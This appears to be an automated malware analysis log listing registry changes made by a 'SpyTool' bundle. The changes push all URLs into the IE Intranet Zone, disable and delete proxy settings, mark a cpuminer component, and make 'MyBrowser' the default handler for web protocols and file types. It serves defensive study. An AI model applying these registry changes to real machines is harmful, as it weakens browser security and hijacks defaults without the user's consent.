[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsh37.tmp:1376 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3B.tmp\Registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 A2 B5 C9 29 BD C4 88 C5 E9 1E B9 07 04 FE 74"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsc43.tmp:1632 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 4D 26 2E 69 43 4B 60 D6 5C A4 32 5B B9 88 FD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nss2A.tmp:1600 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\Registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 74 AD 2C 4F 08 2B 47 80 50 2C 0C B2 0E 5D 75"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nss2A.tmp:228 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 BB 67 3E 82 2A A3 77 98 41 03 D6 50 51 16 52"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process gmsd_re_005010082.exe:436 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 2B D2 12 20 91 AD 7A EB 39 AC 49 3B 80 D7 07"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process tasklist.exe:1920 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 B1 EC 8A 24 C2 E5 D0 1F 7C 67 F6 82 EB AF C6"
The process tasklist.exe:1068 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 E8 0C 96 92 A9 9B 14 5E 6F 9C D1 5B 49 ED 51"
The process setup.exe:268 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150907"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3B.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3B.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 C3 A0 46 5A 6F E2 F5 1C 1B 4B 67 AC 50 64 3E"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
